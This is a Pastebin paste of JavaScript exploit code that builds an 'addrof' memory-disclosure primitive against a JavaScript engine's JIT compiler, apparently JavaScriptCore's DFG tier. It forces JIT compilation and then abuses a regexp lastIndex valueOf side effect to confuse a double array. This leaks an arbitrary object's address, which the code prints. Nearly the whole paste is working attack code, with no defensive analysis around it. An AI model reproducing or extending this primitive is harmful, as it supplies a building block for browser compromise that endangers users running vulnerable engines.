Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // addrof primitive:
- // Leaks address of an arbitrary JSObject
- function setupAddrof() {
- var arg = null;
- var leakme = null;
- let regexp = /a/y;
- function InfoLeaker(a) {
- regexp[Symbol.match](""); // This will invoke 'regexp.lastIndex.toString()'
- return a[0];
- }
- // Force JIT compilation of the infoleak routine
- for (var i = 0; i < 100000; i++) {
- InfoLeaker([1.1, 2.2, 3.3]);
- }
- // Installing an handler on 'valueOf' or 'toString'
- // allows executing arbitrary code without DFG bailing-out
- regexp.lastIndex = {
- valueOf: () => {
- arg[0] = leakme;
- return 0;
- }
- };
- return function(obj) {
- leakme = obj;
- arg = [1.1, 2.2, 3.3];
- return InfoLeaker(arg);
- };
- }
- function trigger_infoleak() {
- let addrOfOnce = setupAddrof();
- // Arbitrary object to leak address of
- var leakme = {};
- // This is an address, but it's represented as a double
- let leakmeAddr = addrOfOnce(leakme);
- if (leakmeAddr == 1.1 || typeof leakmeAddr == "object") {
- print("[-] Could not trigger infoleak!");
- return;
- }
- print("[+] leakme @ " + leakmeAddr);
- }
- trigger_infoleak();
Add Comment
Please, Sign In to add comment